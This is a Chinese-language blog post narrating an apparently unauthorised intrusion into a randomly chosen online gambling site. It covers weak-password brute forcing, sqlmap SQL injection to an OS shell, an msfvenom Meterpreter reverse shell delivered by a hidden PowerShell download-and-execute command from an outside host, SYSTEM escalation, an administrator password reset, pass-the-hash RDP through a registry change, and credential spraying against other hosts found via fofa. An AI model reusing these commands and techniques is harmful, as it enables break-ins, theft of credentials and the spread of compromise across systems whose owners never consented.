前言

閑著無聊，網上隨便找了一個菠菜進行簡單測試，并做筆記記錄，大佬們輕噴，有什么不足之處請指教。

弱口令

訪問網站就是一個登錄頁面，沒有驗證碼直接bp開啟，成功爆出弱口令admin/123456，直接進入后臺。

sql注入獲取權限

翻看了很多功能點，在一處功能點發現上傳接口，并嘗試上傳文件，發現無法上傳，加了白名單。直接選擇放棄，繼續尋找。在某一個/GroupMember.aspx?gid=參數上加上單引號，直接報錯，SQL注入這不就來了么。

說干就干，直接SQLMAP

發現為MSSQL，且DBA權限，直接--os-shell

上線msf

已經獲取普通權限，接下來就是上線msf提權。msf生成powershell腳本，并放置在網站目錄下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps開啟監聽

使用powershell上線session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通過url拼接堆疊執行powershell會存在一個問題，就是單引號閉合問題。我們可以通過對powershell進行編碼一下，這樣就可以繞過單引號的問題。下面推薦一個不錯的網站。

https://r0yanx.com/tools/java_exec_encode/

提權

session已經上線，接下來目標就是獲取system權限。很幸運直接getsystem可以獲取system權限。如果需要提權推薦土豆家族提權，實戰中成功率很高，影響的服務器版本也很多。

遷移一下進程，防止進程掉線。

遠程登錄服務器

發現服務器開啟3389端口，因為是system權限，且為2012系統，大于2008版本都是無法抓到明文密碼，直接修改adminnistrator密碼。（實戰中不推薦直接修改管理員密碼）

利用hash遠程登錄管理員賬號

因為是win2012無法獲取明文密碼，直接修改管理員密碼稍有些不妥。嘗試通過獲取管理員NTLM遠程登錄機器。（并非同一臺，這只是提供一個思路）

使用hash遠程登錄RDP，需要開啟"Restricted Admin Mode"

// 開啟Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已開啟，0x0則表示開啟
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

成功利用hash遠程管理員桌面

其他

前期發現1433端口開放著，尋找數據庫配置文件，登錄數據庫。

通過fofa找了一下，資產還是挺多的，且很多都開放1433端口，猜測會存在同一個人部署的網站，嘗試用獲取的密碼對這些資產的1433端口進行爆破，成功撞到幾臺數據庫，且都是sa權限。結束。

審核編輯：黃飛